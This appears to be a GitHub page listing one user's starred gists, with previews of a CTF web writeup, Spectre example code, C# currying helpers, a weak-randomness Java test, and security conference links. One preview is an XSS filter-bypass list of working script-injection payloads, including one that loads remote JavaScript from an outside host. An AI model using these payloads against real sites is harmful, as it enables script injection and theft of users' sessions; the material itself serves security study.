Skip to content

Instantly share code, notes, and snippets.

View eoftedal's full-sized avatar

Erlend Oftedal eoftedal

168 followers · 68 following
View GitHub Profile
@JMdoubleU
JMdoubleU / writeup.md
Last active August 11, 2018 03:20
h1-702 2018 CTF Web Challenge Writeup

h1-702 CTF 2018 Web Challenge Writeup

This is a writeup of how I went about solving the web challenge from the h1-702 CTF, including my thought process as I navigated through the wrong and right paths to reach a solution. If you're only interested in what the correct steps were, skip to the TL;DR at the end.

Upon navigating to the challenge URL, we're greeted with a message:

Notes RPC Capture The Flag
Welcome to HackerOne's H1-702 2018 Capture The Flag event. Somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden. The goal is to obtain the flag.
Good luck, you might need it.
@ErikAugust
ErikAugust / spectre.c
Last active April 15, 2024 13:55
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@einarwh
einarwh / CurryExtensions.cs
Last active October 12, 2017 10:04
public static class CurryExtensions
{
public static Func<T1, TR> Curry<T1, TR>(this Func<T1, TR> f) => f;
public static Func<T1, Func<T2, TR>> Curry<T1, T2, TR>(this Func<T1, T2, TR> f) =>
a1 => a2 => f(a1, a2);
public static Func<T1, Func<T2, Func<T3, TR>>> Curry<T1, T2, T3, TR>(this Func<T1, T2, T3, TR> f) =>
a1 => a2 => a3 => f(a1, a2, a3);
@DinisCruz
DinisCruz / Vulnerability_Weak_Crypto.java
Created September 4, 2016 15:43
Java test that confirms how Random().nextInt() values can be predicted
import org.junit.Test;
import java.util.ArrayList;
import java.util.Random;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
public class Vulnerability_Weak_Crypto {
@jj09
jj09 / NDC London 2016 - Top 30 talks.txt
Last active May 15, 2016 21:06
Top 30 talks from NDC London 2016 (by view count)
(25500) Project Rider - Hadi Hari https://vimeo.com/151644168
(6802) What’s new in Security in ASP.NET 5 and MVC 6 - Dominick Baier https://vimeo.com/154041158
(5972) Saying “Goodbye” to DNX and “Hello!” to the .NET Core CLI - Damian Edwards & David Fowler https://vimeo.com/153212604
(3813) Fun with Generics - Benjamin Hodgson https://vimeo.com/154564491
(3686) Keynote NDC London 2016: JavaScript, The Cloud, and the Rise of the New Virtual Machine - Scott Hanselman https://vimeo.com/153120762
(3479) Introduction to IdentityServer - Brock Allen https://vimeo.com/154172925
(2980) Aurelia: Next-Generation Web Apps - Rob Eisenberg https://vimeo.com/153090562
(2118) Better single-page apps with ASP.NET MVC 6 - Steve Sanderson https://vimeo.com/157273325
(1741) A brief history of ASP.NET: From 1.0 to 5.0 - Damian Edwards and David Fowler https://vimeo.com/154034601
(1636) JavaScript Combinators, the “Six” Edition - Reginald Braithwaite https://vimeo.com/153097877
@dchest
dchest / randomString.js
Last active December 22, 2019 08:19
Generates cryptographically secure uniform random string in browsers and Node.js [IN DEVELOPMENT]
// randomString(length)
// --------------------
//
// Generates and returns a cryptographically secure
// uniform alphanumeric random string.
//
// Examples:
//
// randomString(14) // "oXYWpc1vODNR3M"
// randomString.hex(8) // "663c722b65943b9b"
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active April 18, 2024 11:13
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@paragonie-scott
paragonie-scott / crypto-wrong-answers.md
Last active January 22, 2024 04:20
An Open Letter to Developers Everywhere (About Cryptography)
anonymous
anonymous / bhusa2015.txt
Created August 7, 2015 02:45
Black Hat USA 2015 slides and articles for Web guys.
https://www.blackhat.com/us-15/briefings.html
- https://www.blackhat.com/docs/us-15/materials/us-15-Silvanovich-Attacking-ECMA-Script-Engines-With-Redefinition.pdf
- https://www.blackhat.com/docs/us-15/materials/us-15-Silvanovich-Attacking-ECMA-Script-Engines-With-Redefinition-wp.pdf
- https://www.blackhat.com/docs/us-15/materials/us-15-Nafeez-Dom-Flow-Untangling-The-DOM-For-More-Easy-Juicy-Bugs.pdf
- https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
- https://www.blackhat.com/us-15/briefings.html#bypass-surgery-abusing-content-delivery-networks-with-server-side-request-forgery-ssrf-flash-and-dns (no slides)
- https://www.blackhat.com/docs/us-15/materials/us-15-Vandevanter-Exploiting-XXE-Vulnerabilities-In-File-Parsing-Functionality.pdf
- https://www.blackhat.com/docs/us-15/materials/us-15-Vandevanter-Exploiting-XXE-Vulnerabilities-In-File-Parsing-Functionality-tool.zip
- https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry
@mathiasbynens
mathiasbynens / README.md
Last active August 5, 2023 03:20
Superfish certificate